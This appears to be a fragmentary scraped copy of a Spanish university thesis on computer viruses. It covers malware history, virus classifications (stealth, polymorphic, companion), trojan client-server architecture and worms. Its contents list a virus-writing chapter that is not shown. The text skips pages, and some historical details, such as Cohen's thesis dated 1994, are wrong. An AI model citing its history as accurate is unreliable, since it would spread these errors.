Professional Documents
Culture Documents
Director
Omar Ivan Trejos
Ingeniero de Sistemas
Decano Facultad de Ingenierías Universidad Tecnológica de Pereira.
2
Nota de aceptación
Jurado
Jurado
3
DEDICATORIA
4
CONTENIDO
Pág.
INTRODUCCIÓN 13
2. JUSTIFICACIÓN 15
2.1. ACADÉMICA 15
2.2. TÉCNICA 15
2.3. SOCIAL 16
2.4. HUMANÍSTICA 16
3. OBJETIVOS 17
5
4.10. AÑO 1989 23
6
5.4.2 Troyano. 40
Arquitectura de un Troyano. 41
Programa Servidor. 41
Programa Cliente. 41
Programa Editor. 41
Como funcionan. 41
5.4.3 Gusano. 42
Cómo se propagan los gusanos y otros tipos de virus. 43
Cómo saber si se tiene un gusano u otro tipo de virus. 43
5.4.4 Puertas traseras. 44
5.4.5 Bomba lógica o Bomba de Tiempo. 46
5.4.6 Spam. 48
5.4.7 Hoax. 50
6. CREANDO UN VIRUS 58
6.5. SUBRUTINAS 65
6.6. FileCopy 65
7
6.7. App.EXEName. 65
6.10. MINUTE(NOW) 67
6.11. SECOND(NOW) 68
8
8.3.1 Scanning o rastreo. 105
8.3.2 Comprobación de suma o CRC (Ciclyc Redundant Check). 106
8.3.3 Programas de vigilancia. 106
8.3.4 Búsqueda heurística. 106
9
9.5. HONEYPOTS Y HONEYNETS 128
BIBLIOGRAFÍA 133
10
LISTADO DE TABLAS
Pág.
11
LISTADO DE FIGURAS
Pág.
Figura 3. Form 64
12
INTRODUCCIÓN
Con herramientas encontradas en la red se creó un Worm básico para ilustrar las
rutinas sencillas que son necesarias para crear estas rutinas de código infecciosas
y nocivas. Se pretende mostrar de manera sencilla las formas en que un equipo
puede ser atacado por un Worm en un lenguaje tan común y comercial como el
Visual Basic. El proyecto no pretende mostrar un virus completamente funcional,
solo presentar un bosquejo, un virus sencillo con las funciones más básicas.
13
1. PLANTEAMIENTO DEL PROBLEMA
Estos programas crean código fuente “nocivo” y el usuario bien puede utilizar el
recién creado virus o estudiar su código fuente para encontrar ideas que le ayuden
a escribir los propios en el futuro. Los virus son y siempre serán una realidad
presente, desde un simple usuario de correo electrónico, que no entiende por qué
su equipo sigue bloqueándose, hasta un administrador de red que trata de
solucionar el desperdicio de recursos y la sobrecarga que determinado virus ha
provocado en su red. Los creadores de antivirus invierten muchos recursos en
investigar y encontrar la solución para cada virus nuevo reportado en el mundo.
No se trata de desarrollar el software antivirus más poderoso, es bien sabido que
los virus son temidos por mucha gente pero conocidos por muy poca, muchos no
saben siquiera donde comienza o donde termina el concepto de virus y aun menos
personas que tienen una definición adecuada del programa nocivo.
14
2. JUSTIFICACIÓN
2.1 ACADÉMICA
2.2 TÉCNICA
15
promedio (no al genio informático) el concepto de software nocivo en un ambiente
práctico.
2.3 SOCIAL
2.4 HUMANÍSTICA
16
3. OBJETIVOS
17
4. HISTORIA DE LOS VIRUS
Robert Thomas Morris fue el padre de Robert Tappan Morris, quien en 1988
introdujo un virus en ArpaNet, la precursora de Internet. Puesto en la práctica, los
contendores del CoreWar ejecutaban programas que iban paulatinamente
disminuyendo la memoria del computador y el ganador era el que finalmente
conseguía eliminarlos totalmente. Este juego fue motivo de concursos en
importantes centros de investigación como el de la Xerox en California y el
Massachussets Technology Institute (MIT), entre otros.
El virus Rabbit hacía una copia de si mismo y lo situaba dos veces en la cola de
ejecución del ASP de IBM lo que causaba un bloqueo del sistema; en el mismo
año la Xerox Corporation presentó en Estados Unidos el primer programa que
contenía un código auto duplicador (Datacraft, 2005)16.
18
La red ArpaNet del ministerio de Defensa de los Estados Unidos de América,
precursora de Internet, emitió extraños mensajes que aparecían y desaparecían
en forma aleatoria, así mismo algunos códigos ejecutables de los programas
usados sufrían una mutación. Los altamente calificados técnicos del Pentágono se
demoraron 3 largos días en desarrollar el programa antivirus correspondiente. Hoy
día los desarrolladores de antivirus resuelven un problema de virus en contados
minutos (Machado, 2005)38.
Los Equipos Apple II se vieron afectados a fines de 1981 por un virus llamado
Cloner que presentaba un pequeño mensaje en forma de poema. Se introducía en
los comandos de control e infectaba los disco cuando se hacia un acceso a la
información utilizado por el comando infectado (Datacraft, 2005)16.
El nombre del sistema operativo de Paterson era "Quick and Dirty DOS" (Rápido
y Rústico Sistema Operativo de Disco) y tenía varios errores de programación
(bugs). La enorme prisa con la cual se lanzó la IBM PC impidió que se le dotase
de un buen sistema operativo y como resultado de esa imprevisión todas las
versiones del llamado PC-DOS y posteriormente del MS-DOS fueron totalmente
vulnerables a los virus, ya que fundamentalmente heredaron muchos de los
conceptos de programación del antiguo sistema operativo CP/M, como por
ejemplo el PSP (Program Segment Prefix), una rutina de apenas 256 bytes, que
es ejecutada previamente a la ejecución de cualquier programa con extensión
EXE o COM (Machado, 2005)38.
19
Keneth Thompson, quien en 1969 creó el sistema operativo UNIX, resucitó las
teorías de Von Neumann y la de los tres programadores de la Bell y en 1983
siendo protagonista de una ceremonia pública presentó y demostró la forma de
desarrollar un virus informático (Machado, 2005)38.
El Dr. Cohen ese mismo año escribió su libro "Virus informáticos: teoría y
experimentos", donde además de definirlos los califica como un grave problema
relacionado con la Seguridad Nacional. Posteriormente este investigador escribió
"El evangelio según Fred" (The Gospel according to Fred), desarrolló varias
especies virales y experimentó con ellas en un computador VAX 11/750 de la
Universidad de California del Sur.
La verdadera voz de alarma se dio en 1984 cuando los usuarios del BIX BBS, un
foro de debates de la ahora revista BYTE reportaron la presencia y propagación
de algunos programas que habían ingresado a sus computadoras en forma
subrepticia, actuando como "caballos de troya", logrando infectar a otros
programas y hasta el propio sistema operativo, principalmente al Sector de
Arranque. Al año siguiente los mensajes y quejas se incrementaron y fue en 1986
que se reportaron los primeros virus conocidos que ocasionaron serios daños en
las IBM PC y sus clones (Machado, 2005)38.
20
Entonces desarrolló una demostración de este efecto, que llamó 'Virdem'. Lo
distribuyó en la 'Chaos Computer Conference' de diciembre de ese año, en la
cual el tema principal eran precisamente los virus. La demostración tuvo tanto
éxito que Burger escribió un libro sobre el tema, en el que no se mencionaba aún
a los virus del sector de arranque (Virusprot.com, 2005)63.
En ese año se difundieron los virus (c) Brain, Bouncing Ball y Marihuana y que
fueron las primeras especies representativas de difusión masiva. Estas 3 especies
virales tan sólo infectaban el sector de arranque de los diskettes, posteriormente
aparecieron los virus que infectaban los archivos con extensión EXE y COM
(Machado, 2005)38.
Mientras tanto, en los Estados Unidos Fred Cohen acababa de completar su tesis
doctoral, que versaba precisamente sobre los virus informáticos. El doctor Cohen
demostró que uno no puede escribir un programa que sea capaz de, con un cien
por ciento de aciertos, visualizar un archivo y decidir si es o no un virus. Desde
luego, nadie pensó jamás en esa posibilidad, pero Cohen hizo buen uso de un
teorema matemático, y así fue como se ganó el doctorado. Sus experimentos
sobre la difusión de virus en los sistemas informáticos demostraron que la
expansión de las infecciones resultaba ser mucho más rápida de lo que nadie
hubiera esperado.
Cohen visitó la Universidad Lehigh, y allí se encontró con Ken van Wyk. De este
encuentro surgió el virus 'Lehigh', que nunca abandonó el laboratorio, porque sólo
podía infectar COMMAND.COM y dañar increíblemente su host después de tan
sólo cuatro replicaciones. Una de las reglas básicas sobre los virus es que aquel
de ellos que dañe de forma muy rápida su host, no sobrevive durante mucho
21
tiempo. De todas formas, el virus Lehigh se hizo muy popular, y fomentó la
aparición del grupo de noticias sobre virus de Ken van Wyk en Usenet
(Virusprot.com, 2005)63.
En 1987 La IBM fue atacada por un virus que hizo que se volviera lento, muy
lento, tanto que paralizo por 72 horas el sistema de mensajes de correo interno de
dicha empresa, este virulento amigo presentaba un mensaje con una imagen de
un arbolito navideño y pedía que tecleara la palabrita "CHRISTMAS" y si se
negaba se apagaba la PC y para remate impedía que guarde los trabajos
realizados y se perdía muchas horas de estar frente al monitor y presionado
teclas. Y si tecleaba la palabrita se introducía a la lista de correo y este se
diseminaba por la red (Datacraft, 2005)16.
Esta conclusión no la tomarón debido a la incidencia del popular 'gusano del árbol
de Navidad', de amplia difusión, sino porque IBM sufrió un brote del virus
'Cascade', y se encontró en la embarazosa necesidad de tener que comunicar a
sus clientes que ellos también habían sido infectados. Desde este momento, el
'High Integrity Laboratory' de IBM fue el encargado del área virus. En aquel
momento, cada nueva aparición de virus provocaba la aplicación de un análisis
paso-a-paso. El software existente era utilizado para detectar virus de sector de
arranque, y solamente fue escrito un programa anti-virus, de manera excepcional,
para afrontar los rebrotes de 'Cascade' y 'Jerusalem' (Virusprot.com, 2005)64.
El usar programas originales siempre son mencionados como libres de virus ; sin
embargo, la empresa Aldus Corporation lanzo al mercado productos con virus
begninos, tales productos eran Free Hand para Macintosh, MacMag ó Brandow;
este virus presentaba un mensaje de Paz y fue introducido para celebrar el
aniversario de Macintosh II, el 2 de marzo de 1988. Este virulento amigo recibió el
nombre de "virus macintosh peace" y se cree que apareció el mensaje 350000
en pantallas de PC´s entre EE:UU. Y Canadá , se difundió por muchos servicios
de software compartido.
Richard R. Brandow, editor de la revista MacMag de Montreal, Canadá contrató a
un programador para realizar el mencionado virus, que pronto se propago por
22
medio de los servicios de cartelera electrónica - [Bulletin Board Systems (BBS)]
(que son sistemas de servicio de software o información compartida por
computadora vía módem). La Defensa de Aldus se baso que la infección partió
de un disco infectado que utilizaron de demostración que proporciono un
proveedor y que este adquirió el virus en un programa de juegos de la -[Bulletin
Board Systems (BBS)] - y sin saberlo se incluyo en el programa y los que
diseminaron el virus fueron las copias ilegales.
Será siempre recordado como el año en el que las cosas se pusieron difíciles. El
virus 'Fu Manchú' (una modificación del 'Jerusalem') fue difundido por alguien
anónimo en el Reino Unido, junto con el '405'. Por otra parte, los búlgaros y los
rusos empezaron a interesarse por el tema. En marzo de este año, un pequeño
incidente fue el aviso de la gran avalancha que se avecinaba: en Holanda, un tal
Fred Vogel contactó con Alan Solomom, para contarle que había encontrado un
virus nuevo en su disco duro, llamado 'Datacrime', y que estaba preocupado
porque al parecer, su fecha de activación estaba prevista para el día 13 del mes
siguiente.
Se redactó un informe sobre los efectos de este virus, que se publicó en una
revista, y otros medios de comunicación se hicieron eco del caso, llegando en
23
Junio a la errónea conclusión de que este virus se activaría cada 12 de octubre,
cuando en realidad podría activarse cualquier día entre el 12/10 y el 31/12 y era
capaz de borrar toda la información contenida en el disco duro.
Por otro lado el New York Times anuncio el 30 de octubre que las computadoras
de la NASA habían sido interferidas por desconocidos y causando problemas en
el lanzamiento del Atlantis, más de 60 PC´s fueron infectadas esa ocasión y el
intruso se siguió multiplicándose por medio de la red comercial de la NASA con
empresas privadas del dicho país. Se estima que dicho banco de datos
internacionales llegaría a más de medio millón de PC´s infectadas.
(Datacraft, 2005)16.
Este año tan agitado terminó con la distribución de 20.000 copias de un famoso
código malicioso, el Aids Information Diskette, que fueron enviadas por correo a
usuarios que figuraban en bases de datos de diversos organismos, por ejemplo el
PC Business World. Este documento contenía instrucciones de instalación
detalladas que originaban la creación de archivos y directorios ocultos, editando el
contenido de AUTOEXEC.BAT, de modo que uno de estos archivos estaba
presente en cada motor de arranque. El Ttroyano' que contenía encriptaba todos
los archivos del disco duro, otorgándoles los atributos alojados en él. De este
24
incidente es que consiguió otorgar mayor popularidad a los virus, aunque el código
malicioso protagonista del hecho en realidad era un troyano.
Los virus 'Dark Avenger' introdujeron dos conceptos nuevos: la infección rápida
(el virus se instalaba en la memoria, y la simple apertura de un archivo provocaba
una infección vertiginosa del disco duro) y el ataque remoto (algunos de estos
virus sobrescribían código cada cierto tiempo, por lo que si el usuario no se daba
cuenta y hacía 'backup' de los datos periódicamente, auto replicaba sin querer
todas las líneas de código maligno). Otros virus clásicos de parecida actuación
durante este periodo fueron 'Number-of-the-Beast' y 'Nomenklatura'.
Sin embargo, 'Dark Avenger' era el más creativo en el proceso de distribución de
sus virus. Cargaba sus códigos malignos en BBS's, infectando los programas anti-
25
virus shareware, y en sus ataques víricos incluía un archivo que cumplía la
función de tranquilizar a todo aquel que comprobara el tamaño del archivo o
realizara un 'checksumming'. Incluso se permitía el lujo de incluir su código
fuente para que los legos pudieran aprender cómo se creaban virus
(Virusprot.com, 2005)66.
En este mismo año tuvo lugar otro evento en Bulgaria: la aparición de la primera
BBS de intercambio de virus. En ella la gente podía descargarse cualquier virus
en el que estuviera interesado, si previamente había dejado algún código maligno
propio para los usuarios de este sistema. Esto, claro está, favoreció tanto la
creación de nuevos virus como la difusión masiva de muchos de ellos.
26
famoso por su ingeniosa programación, peligrosa y rápida técnica de infección, a
tal punto que se han escrito muchos artículos y hasta más de un libro acerca de
este virus, el mismo que posteriormente inspiró en su propio país la producción
masiva de sistema generadores automáticos de virus, que permiten crearlos sin
necesidad de programarlos (Machado, 2005)38.
'Glut' quiere decir algo así como 'superabundancia', lo cual, referido al tema de
proliferación de virus, causó la aparición de múltiples y desagradables nuevos
problemas. Los programar tenían muchas limitaciones. En particular, era
necesario el almacenamiento de gran cantidad de datos en memoria para
proceder a un escaneo en busca de virus, y bajo DOS sólo había disponibles 640
Kb utilizables. Otro problema es que algunos escáneres eran demasiado lentos,
en proporción al gran número de virus que debían detectar. Además, el análisis de
virus requiere no sólo su detección real, sino su desinfección efectiva. Si cada día
hubiera que proceder al análisis de un nuevo virus, solamente se podrían detectar,
analizar y desinfectar unos 250 por año. Eso quiere decir que más virus significa
también más trabajo para los desarrolladores.
Al igual que la corriente búlgara, en 1991 apareció en el Perú el primer virus local,
autodenominado Mensaje y que no era otra cosa que una simple mutación del
virus Jerusalem-B y al que su autor le agregó una ventana con su nombre y
número telefónico. Los virus con apellidos como Espejo, Martínez y Aguilar fueron
variantes del Jerusalem-B y prácticamente se difundieron a nivel nacional en el
Perú (Virusprot.com, 2005)67.
27
Fue el año de la aparición de la Self Mutating Engine (MtE) de Dark Avenger.
En principio, la comunidad mundial pensó que se trataba de un nuevo virus, de
nombre 'Dedicated', pero después hizo aparición la MtE. MtE es un archivo OBJ,
con el código fuente de un simple virus e instrucciones para enlazar el archivo
OBJ a un virus, de tal manera que, al final, se podía obtener un virus polimórfico.
Inmediatamente, los "cazadores" de virus se pusieron a la tarea de desarrollar
detectores para la MtE. En un principio, se creyó que habría cientos y cientos de
virus haciendo uso de MtE, ya que era muy fácil de usar y permitía a dichos virus
ocultarse de forma extraordinaria. Pero los creadores de virus se dieron cuenta
rápidamente de que un escáner que fuera capaz de detectar un MtE podía
detectar todos (Virusprot.com, 2005)68.
Otro virus importante que surgió durante este periodo fue 'Starship'. Se trata de
un virus completamente polimórfico, que constaba de una serie de trucos anti-
debbuging y anti-checksumming. Los programas de 'checksumming' sirven
para detectar un virus en función de que posee código ejecutable que muta para
replicarse. 'Starship' solamente infectaba los archivos cuando éstos eran
copiados desde el disco duro al diskette. Por lo tanto, los archivos residentes en
el disco duro no cambiaban nunca. Pero la copia del diskette estaba infectada,
por lo que si este diskette se introducía en otro equipo y se chequeaba el sistema
por medio del 'checksummer', éste lo aceptaba sin problemas. El virus 'Starship'
se instalaba a sí mismo en el disco duro, pero sin hacer ningún cambio en el
código ejecutable. Cambiaba los datos, eso sí, de partición, efectuando una nueva
partición en el 'boot'.
Esta nueva partición contenía el código del virus, que se ejecutaba antes de pasar
el control a la partición 'boot' original. Probablemente, el virus más importante
durante 1992 fue el conocido 'Michelangelo'. Uno de los más conocidos
vendedores de productos anti-virus norteamericano dio la alerta: cerca de cinco
millones de PCs podían venirse abajo el 6 de marzo de este año. En muchas
empresas cundió el pánico, cuando los medios de comunicación se hicieron eco
de este asunto. Sin embargo, el 6 de marzo sólo tuvieron problemas entre 5.000 y
10.000 equipos informáticos, y naturalmente los vendedores de software tuvieron
que moderar el ímpetu de sus avisos de alarma. Probablemente, nunca se llegara
a saber cuánta gente, en realidad, se vio afectada por 'Michelangelo', pero lo
cierto es que en los días previos al 6 de marzo la mayoría de los usuarios llevaron
a cabo exhaustivos exámenes de sus equipos en pos del virus.
Después de esta fecha, muchos expertos en virus de todo el mundo vieron como
sus opiniones, siempre tenidas en cuenta, eran objeto del más absoluto desprecio.
28
En agosto del presente año surgen los primeros paquetes de virus de autor.
Primero apareció el VCL ('Virus Creation Laboratory'), de 'Nowhere Man', y a
continuación 'Dark Angel' generó el 'Phalcon/Skism Mass-Producer Code
Generator'. Estos paquetes hicieron posible que cualquier persona pudiera hacer
uso de un PC para escribir su virus personal. En el transcurso de un año,
aparecieron, en consecuencia, docenas de nuevos virus en el mercado, todos
ellos creados mediante el uso de estas herramientas (Virusprot.com, 2005)68.
Otro de los hechos destacables en este año tan movido fue la aparición de
personas que se dedicaban a la venta de colecciones de virus. Para ser más
precisos, se trataba realmente de colecciones de archivos, algunos de los cuales
eran virus. En los Estados Unidos, John Buchanan ofreció su colección de unos
cuantos miles de códigos al precio de 100 dólares por copia, y en Europa, la
Unidad Clínica de Virus sacó a la venta varias colecciones por 25 dólares la copia
(Virusprot.com, 2005)68.
XTREE anunció que iban a abandonar el negocio del software anti-virus. Era la
primera gran compañía que renunciaba a la lucha. Casi al mismo tiempo, un
nuevo grupo de creadores de virus hizo su aparición en Holanda: su nombre,
'Trident'. El principal creador de virus de este grupo, Masouf Khafir, elaboró una
máquina polimórfica denominada, precisamente, 'Trident Polymorfic Engine', y
lanzó un virus que la utilizaba llamado 'GIRAFE'. A esto, le siguieron varias
nuevas versiones de TPE. Este virus es mucho más difícil de detectar que el MtE,
y mucho más difícil de evitar sus falsas alarmas.
Khafir también lanzó el primer virus que trabajaba de acuerdo con un principio que
ya fue enunciado por Fred Cohen. El virus 'Cruncher' era un código maligno de
compresión que automáticamente se incluía en archivos para autoinstalarse en
29
tantos equipos como fuera posible. Mientras tanto, 'Nowhere Man' y el grupo
'Nuke' había estado, también, bastante ocupados.
A principios de este mismo año, fue lanzado el Nuke Encryption Device (NED).
Se trataba de otro mutador mucho más difícil de neutralizar que MtE. El virus
consiguiente, 'Itshard', pronto siguió a la aparición de esta nueva máquina
polimórfica. También 'Dark Angel' quiso apuntarse a la moda del polimorfismo.
Este creador de virus lanzó DAME ('Dark Angel's Multiple Encryptor Device
(NED)'). Se trataba de otro mutador cuyo virus era 'Trigger'. Este código relanzó la
versión 1.4 de TPE (de nuevo, era mucho más complejo y difícil de erradicar que
en las versiones previas), y lanzó un virus llamado 'Bosnia' que lo utilizaba
(Virusprot.com, 2005)69.
Pero el más famoso de los polimórficos que aparecieron a principios de 1993 fue
'Tremor', el cual ascendió rápidamente a las alturas de la fama cuando fue
difundido a través de un show de la televisión alemana dedicado precisamente a
las novedades del software. El archivo infectado fue PKUNZIP.EXE, que la
mayoría de los recipientes usaban para descomprimir los archivos que recibía.
En 1997 se disemina a través de Internet el primer macro virus que infecta hojas
de cálculo de MS-Excel, denominado Laroux, y en 1998 surge otra especie de
esta misma familia de virus que ataca a los archivos de bases de datos de MS-
Access (Udec, 2005)62.
30
4.16 AÑO 1999
A fines de Noviembre de este mismo año apareció el Bubbleboy, primer virus que
infecta los sistemas con tan sólo leer el mensaje de correo, el mismo que se
muestra en formato HTML. En Junio del 2000 se reportó el VBS/Stages.SHS,
primer virus oculto dentro del shell de la extensión .SHS (Udec, 2005)62.
Los virus informáticos son programas, estos contienen instrucciones que puede
ejecutar cualquier ordenador, no contienen información del autor ni fecha de
creación, son pequeños en tamaño, y tienen la capacidad de tomar el control
sobre otros programas. Se añaden a cualquier tipo de archivo de tal forma que
cuando estos se ejecutan, el virus también lo hace, causando dificultades en el
debido funcionamiento del ordenador y pueden dañar la información que se tiene
almacenada, registra, y hacen lento el trabajo del equipo.
4.17.1 Otras definiciones. El primer autor oficial de los virus, Fred B. Cohen,
quien en 1994 escribió su tesis doctoral acerca de los virus, definiéndolos como
«un programa de ordenador que puede infectar otros programas modificándolos
para incluir una copia de sí mismo» (Wikipedia, 2005)71.
31
verdad no se extiende a menos que se realice una acción, como compartir un
archivo o enviar un mensaje de correo electrónico (Microsoft, 2005)42.
La forma más común en que se transmiten los virus es por diskette, descarga
o ejecución de archivos adjuntos a e-mails. También se pueden encontrar virus
simplemente visitando ciertos tipos de páginas Web que utilizan un componente
llamado ActiveX o Java Applet. Además, se puede llegar a ser infectado por un
virus simplemente leyendo un e-mail dentro de ciertos tipos de programas de e-
mail como Outlook, Outlook Express, Netscape mail o Eudora Pro (Alerta
Virus, 2005)4.
Cuando un virus lleva a cabo la acción para la que había sido creado, se dice que
se ejecuta la carga (payload). Cuando se inicia la carga, la mayoría de los virus
son inofensivos, y no hacen más que mostrar mensajes de diferentes tipos. Otros
pueden ser bastante maliciosos por naturaleza e intentan producir un daño
irreparable al ordenador causando daños a los archivos
desplazando/sobrescribiendo el sector de arranque principal (master boot record
- MBR), borrando los contenidos del disco duro o incluso escribiendo sobre la
BIOS, dejándolo inutilizable. La mayoría de los virus no tenderán a borrar todos
los ficheros del disco duro. La razón de esto es que una vez que el disco duro se
borra, se eliminará el virus, terminando así el problema (Alerta Virus, 2005)4.
32
virus queda instalado y comienza a enviar mensajes de texto continuamente hasta
agotar la batería, ya que este utiliza la agenda de teléfonos almacenada en el
celular, aparte aprovecha el uso de tecnologías como GPRS y Bluetooth donde
emite el mensaje a quien se encuentre cerca a una distancia no mayor de 10
metros.
Las agendas electrónicas las cuales poseen un buen manejo del multimedia
también son victimas de estos programas ya que algunas manejan sistemas
operativos basados en Windows y son aprovechados para propagar programas
que hagan estragos en estos sistemas, por lo tanto cada tecnología que ofrezca
interoperabilidad con nuestro alrededor esta propenso a ser victima de algún
ataque vírico por parte de los desarrolladores de código malicioso ya que
aprovechan la comunicación que estos pueden ofrecer con otros medios.
33
5.1 QUIEN HACE LOS VIRUS
El porque de crear virus, solamente quien los hace lo sabe con certeza. Algunos
virus se crean por el desafío tecnológico de crear una amenaza que sea única, no
detectable, o simplemente devastadora para su víctima. Sin embargo, es discutible
que la mayoría de las personas crean virus por vanidad. El creador espera que el
virus se propague de tal manera que le haga famoso. La notoriedad aumenta
cuando el virus es considerado una amenaza donde los fabricantes de antivirus
tienen que diseñar una solución (Alerta virus, 2005)4.
34
La característica principal de estos programas es su facultad de duplicación,
existen otras particularidades de los virus, como son las siguientes:
- Es nocivo para la computadora: esto depende del virus con el que se trate, se
pueden encontrar programas que destruyen parcial o totalmente la información, o
bien programas que tan solo presentan un mensaje continuo en pantalla, el cual
aunque no hace daño al final es muy molesto. Se ocultan al usuario: claramente,
el programador del virus desea que el usuario no lo advierta durante el máximo
tiempo posible, hasta que aparece la señal de alarma en la computadora.
Conforme pasa el tiempo, los virus van generando más y mejores técnicas de
ocultamiento, pero también se van desarrollando los programas antivirus y de
localización (Hernández, 2000)1.
Generalmente hay dos clases principales de virus. Los que infectan archivos, y los
que infectan el sector de arranque. Los que infectan archivos se adhieren a
programas normales, usualmente infectan cualquier COM y/o EXE, aunque
algunos pueden infectar cualquier programa que se ejecute o interprete, como
archivos SYS, OVL, OBJ, PRG, MNU y BAT. Hay al menos un virus para PC que
infecta archivos fuente insertando código en archivos, que reproduce la función
del virus en cualquier ejecutable generado a partir de los archivos fuente
infectados.
35
infectado se ejecuta, y a partir de ahí infecta a otros programas cuando son
ejecutados, como es el caso del virus Jerusalem o simplemente cuando se dan
otras condiciones (Google, 2005)29.
Hay unos pocos virus que pueden infectar tanto a archivos como rutinas de
arranque, como por ejemplo el virus Tequila, y que se denominan "multi-partita" o
también de archivo y arranque. Aparte de la clasificación anterior, muchos
expertos en virus distinguen alguna o ambas de las distintas clases de virus:
- Virus de cluster o del sistema de archivos, son aquellos que modifican la tabla de
las entradas de los directorios de forma que el virus es cargado y ejecutado antes
que el programa original, que no es físicamente alterado, sino sólo su información
del directorio. Hay quienes consideran estos como una tercera categoría de virus,
mientras que otros piensan que son una subcategoría de los que infectan
archivos.
- Los virus del núcleo o kernel, que aprovechan las particularidades de los
programas que forman el sistema operativo, un virus que infecta archivos y puede
infectar programas del núcleo no es un virus del núcleo. Este término se reserva
para describir virus que usan alguna particularidad de los archivos del núcleo,
como su ubicación física en disco o la forma de carga o llamada (Google, 2005)29.
5.3.1 Virus Macros. Los virus de Macro están más elaborados y son virus
escritos a partir del macro-lenguaje de una aplicación determinada. Por ejemplo
podemos citar el Word, procesador de textos. Estos virus, son realmente dañinos,
porque son capaces de borrar un texto, dado que los bloques macro son diminutos
programas del propio Word, por ejemplo, que permite ejecutar varias funciones
seguidas o a la vez con solo activar la casilla.
Los virus macros se restringen a los usuarios de Word, tiene una importante
propagación ya que puede infectar cualquier texto, independientemente de la
plataforma bajo la que éste se ejecute: Mac, Windows 3.x, Windows NT, W9.x,
WXp y OS/2. Este es el motivo de su peligrosidad, ya que el intercambio de
documentos en disquete, CDS o por red es mucho más común que el de
ejecutables.
36
con funciones de copiar y pegar por ejemplo, no se pierden datos, pero si resulta
algo bastante molesto (Hernández, 2005)31.
5.3.2 Virus que infectan rápido/lento (Fast/Slow). Un virus que infecta archivos
(como el Jerusalem), se copia a memoria cuando un programa infectado por él
es ejecutado, y a partir de ahí se propaga a otros programas cuando son
ejecutados. Un virus que infecta rápidamente es el que, cuando está activo en
memoria, infecta no sólo los programas que se ejecutan, sino incluso los que
simplemente son abiertos.
5.3.4 Virus furtivo ó Stealth. Un virus furtivo es el que, mientras está activo,
oculta las modificaciones que ha hecho a archivos o zonas de arranque. Esto
normalmente se hace supervisando las llamadas a las funciones del sistema que
se usan para leer archivos o sectores del medio de almacenamiento y
manipulando los resultados. Esto significa que los programas que intentan leer
archivos o sectores contaminados sólo ven los datos originales en lugar de los
que están infectados realmente.
Las modificaciones hechas por el virus pueden pasar inadvertidas para los
programas antivirus. No obstante, para hacer esto el virus debe estar residente en
37
memoria cuando el programa antivirus se ejecuta, y esto sí puede ser detectado.
Como un ejemplo esta el primer virus de DOS, Brain, que infecta el sector de
arranque, supervisa las entradas/salidas del disco y redireccióna cualquier intento
de leer un sector infectado por él, al área del disco donde el sector original está
almacenado (Google, 2005)29.
Para identificar efectivamente todas las variantes de este tipo de virus, el antivirus
tiene que disponer de unas rutinas específicamente construidas tras un análisis
detallado del virus. Una de las formas más elaboradas de polimorfismo usada
hasta ahora es el "Mutation Engine" (MtE) que viene en forma de código objeto.
Con el "Mutation Engine" cualquier virus puede hacerse polimórfico añadiendo
ciertas llamadas en su código fuente y enlazándolo con los módulos generadores
de números aleatorios de "Mutation-Engine". La llegada de los virus polimórficos
conlleva una tarea cada vez más complicada y cara para la búsqueda de virus.
Añadiendo más y más cadenas a los antivirus, simplemente no funcionará
adecuadamente con estos virus (Google, 2005)29.
5.3.6 Virus cifrado (Encrypted). Un virus cifrado es aquel que usa métodos
criptográficos, en un intento de esquivar los antivirus basados en cadenas de
búsqueda, es el autocifrado con una clave variable. Estos virus como el Cascade,
no se denominan polimórficos, ya que su código descifrado es invariable.
La rutina de descifrado se puede usar como una cadena de búsqueda para los
antivirus más simples, a no ser que otro virus use idéntica rutina de descifrado y
se desee una identificación exacta (Google, 2005)29.
38
a cabo la ejecución de algún programa (virus residentes) o actuar directamente
haciendo copias de sí mismos (virus de acción directa) (Alerta virus, 2005)5.
Al contrario que los virus de sobre escritura o los residentes, los virus de compañía
no modifican los archivos que infectan. Cuando el sistema operativo está
trabajando (ejecutando programas, archivos con extensiones EXE y COM) puede
ocurrir que éste, el S.O, tenga que ejecutar un programa con un nombre
determinado. Si existen dos archivos ejecutables con el mismo nombre pero con
diferentes extensiones (uno con extensión EXE y otro con extensión COM), el
sistema operativo ejecutará en primer lugar el que lleve la extensión COM. Esta
peculiaridad del sistema operativo es aprovechada por los virus de compañía. En
caso, de existir un archivo ejecutable con un determinado nombre y extensión
EXE, el virus se encargará de crear otro archivo con el mismo nombre pero con
extensión COM haciéndolo invisible (oculto) al usuario para evitar levantar
sospechas.
39
Los virus en la actualidad presentan distintos tipos de infección y formas de ataque
para lo cual existen algunas clasificaciones para estos tipos de código, debido a
que estos no se propagan todos de igual manera ni por los mismos medios, y no
siempre efectúan los mismos ataques a los usuarios; algunos existen para
recopilar información como passwords del usuario quien a sido infectado y luego
retransmitir esta información a personas ajenas, otros simplemente atacan los
datos que se encuentran almacenados y otros tienen como objetivo ralentizar el
flujo de la información donde el Internet por ejemplo ya ha sido victima.
5.4.2 Troyano. Timeo Danaos et dona ferentes - Temo a los griegos incluso
cuando hacen un regalo. (Virgilio, la Eneida, II, 49).
En la historia Troya era una ciudad inquebrantable para los griegos quienes
intentaban tomarla, estos al ver la dureza de los troyanos simularon su retirada y
fin del asedio, dejando, como presente y muestra de respeto, un enorme caballo
de madera. Los troyanos aceptaron este enorme caballo y lo introdujeron en su
ciudad. Pero en realidad el caballo era una estrategia utilizada por los griegos para
tomar la ciudad, ya que contenía en su interior a soldados enemigos, que cuando
tuvieron la oportunidad, salieron y permitieron el paso de sus tropas abriendo las
puertas de la ciudad así de esta manera tan ingeniosa finalmente tomaron Troya.
40
aquí de donde viene la comparación con la leyenda del caballo de Troya (El
Hacker, 2005)19.
El módulo servidor puede estar protegido con una contraseña la cual debe ser
introducida por el cliente para tener el control, de esta manera el atacante evita
que otra persona intente desde otro modulo cliente tome el control. El cliente
necesita la dirección IP de la maquina donde esta instalado el modulo servidor
para poder entablar una conexión. El cual puede ser enviado por el servidor a una
lista de correo, un canal de IRC, al ICQ, algún correo electrónico, un mensaje
instantáneo, etc. El equipo servidor mantiene abiertos uno o mas puertos
específicos a la espera de tener comunicación con el programa cliente y así
empezar a recibir instrucciones para empezar a ejecutarlas.
41
muchas personas conviven con más de algún Troyano en el PC y nunca llegan a
percatarse de ello.
Un gusano, al igual que un virus, está diseñado para copiarse de un equipo a otro,
pero lo hace de forma automática tomando el control de las características del
equipo que pueden transportar archivos o información. Una vez que el virus está
en el sistema, puede desplazarse sólo. El mayor peligro de los gusanos es su
capacidad para replicarse en grandes cantidades. Por ejemplo, un gusano puede
enviar copias de sí mismo a todas las personas que se encuentran en la libreta de
direcciones de correo electrónico y los equipos de esas personas harán lo mismo,
